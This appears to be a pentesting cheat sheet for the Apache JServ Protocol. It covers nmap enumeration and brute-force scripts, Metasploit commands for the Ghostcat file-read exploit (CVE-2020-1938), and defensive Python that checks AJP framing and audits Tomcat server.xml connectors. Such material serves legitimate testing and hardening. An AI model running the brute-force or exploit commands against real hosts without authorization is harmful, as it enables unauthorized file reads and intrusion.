AJP (Apache JServ Protocol) Pentesting
Last modified: 2022-11-22
AJP (Apache JServ Protocol) is a binary protocol used by a front-end web server (typically Apache httpd with mod_jk or mod_proxy_ajp) to proxy inbound requests to an application server such as Tomcat that sits behind it. The default port is 8009.
Enumeration
nmap --script ajp-auth -p 8009 <target-ip>
nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 <target-ip>
nmap --script ajp-brute -p 8009 <target-ip>
nmap --script ajp-headers -p 8009 <target-ip>
nmap --script ajp-methods -p 8009 <target-ip>
nmap --script ajp-request -p 8009 <target-ip>
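The nmap scripts above all speak the same AJP13 framing that the page describes as "a binary protocol". The following Python snippet is an added example (not from the original page or from nmap) that builds the client-side CPing packet and parses a constructed CPong reply, which is the minimal exchange a web server uses to check that the container behind it is alive. The magic bytes (0x1234 towards the container, "AB" back from it), the 2-byte big-endian length field and the CPing/CPong prefix codes are taken from the AJP13 specification; the sample reply bytes are constructed here for the demonstration.

```python
import struct
from typing import Tuple

# AJP13 framing constants (from the protocol specification).
AJP_MAGIC_TO_SERVER = b"\x12\x34"   # web server -> servlet container
AJP_MAGIC_FROM_SERVER = b"AB"       # servlet container -> web server (0x41 0x42)
PREFIX_CPING = 0x0A                 # "are you alive?" sent by the web server
PREFIX_CPONG = 0x09                 # "yes" sent back by the container
MAX_PAYLOAD = 8192                  # AJP13 packets are at most 8 KiB


def build_packet(payload: bytes) -> bytes:
    """Frame a web-server -> container packet: magic, 2-byte length, payload."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("AJP payload exceeds 8192 bytes")
    return AJP_MAGIC_TO_SERVER + struct.pack(">H", len(payload)) + payload


def build_cping() -> bytes:
    """CPing is a one-byte payload: just the prefix code."""
    return build_packet(bytes([PREFIX_CPING]))


def parse_packet(data: bytes, from_server: bool = True) -> Tuple[int, bytes]:
    """Validate AJP framing and return (prefix_code, body_after_prefix).

    Raises ValueError on a wrong magic, a truncated packet or trailing bytes,
    which is what a defensive parser on either side of the link should do.
    """
    magic = AJP_MAGIC_FROM_SERVER if from_server else AJP_MAGIC_TO_SERVER
    if len(data) < 4:
        raise ValueError("packet shorter than the 4-byte AJP header")
    if data[:2] != magic:
        raise ValueError(f"bad AJP magic {data[:2]!r}, expected {magic!r}")
    (length,) = struct.unpack(">H", data[2:4])
    payload = data[4:]
    if len(payload) != length:
        raise ValueError(f"length field says {length} bytes, got {len(payload)}")
    if length == 0:
        raise ValueError("empty AJP payload has no prefix code")
    return payload[0], payload[1:]


def is_cpong(reply: bytes) -> bool:
    """True when the container answered a CPing with a well-formed CPong."""
    try:
        prefix, body = parse_packet(reply, from_server=True)
    except ValueError:
        return False
    return prefix == PREFIX_CPONG and body == b""


if __name__ == "__main__":
    # Constructed sample of the container's reply; not captured from a real host.
    SAMPLE_CPONG = b"AB\x00\x01\x09"
    print("CPing on the wire:", build_cping().hex())
    print("reply is CPong:", is_cpong(SAMPLE_CPONG))
```

The same `parse_packet` function rejects a truncated or over-long frame, which is the first check a monitoring tool placed in front of port 8009 should perform before trusting anything else in the packet.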
Ghostcat File Inclusion
Ghostcat is a file read/inclusion vulnerability in the Tomcat AJP connector (CVE-2020-1938).
The Metasploit auxiliary module below exploits it.
msfconsole
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts <target-ip>
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit
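Whether the module above succeeds depends on how the AJP connector in Tomcat's `server.xml` is configured. The following Python script is an added example, not part of the original page or of Tomcat itself: it embeds a constructed weak connector definition (the pre-CVE-2020-1938 style: no `address`, no `secret`) next to a hardened one (loopback `address`, `secretRequired="true"` with a `secret`) and audits any `server.xml` text for AJP connectors that still look like the weak one. The attribute names `address`, `secret` and `secretRequired` are real Tomcat connector attributes; the placeholder secret value is constructed and must be replaced.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed sample: an AJP connector as commonly shipped before the fix.
WEAK_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: the same connector restricted to loopback and protected
# by a shared secret that the front-end web server must present.
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"
               redirectPort="8443" />
  </Service>
</Server>
"""


def audit_ajp_connectors(server_xml: str) -> List[str]:
    """Return one finding per weakness found on each AJP Connector element."""
    findings: List[str] = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        # Matches "AJP/1.3" as well as explicit class names such as
        # org.apache.coyote.ajp.AjpNioProtocol.
        if "AJP" not in protocol.upper():
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address is None:
            findings.append(
                f"port {port}: no 'address' set; Tomcat before 9.0.31/8.5.51/7.0.100 "
                "binds AJP to all interfaces by default")
        elif address in ("0.0.0.0", "::", "*"):
            findings.append(f"port {port}: AJP bound to wildcard address {address}")
        secret_required = conn.get("secretRequired", "true").strip().lower() == "true"
        secret = (conn.get("secret") or "").strip()
        if not secret_required:
            findings.append(
                f"port {port}: secretRequired=\"false\" lets any client speak AJP without a secret")
        elif not secret:
            findings.append(
                f"port {port}: no 'secret' set; front-end web servers cannot be authenticated")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(f"[{label}]")
        for finding in audit_ajp_connectors(xml_text) or ["no AJP findings"]:
            print("  -", finding)
```

Run it against a real `server.xml` by reading the file into a string and passing it to `audit_ajp_connectors`. Removing the AJP connector entirely when no front-end proxy uses it is the simplest fix; where it is needed, the hardened shape above plus an upgraded Tomcat is what the module on this page should no longer be able to exploit.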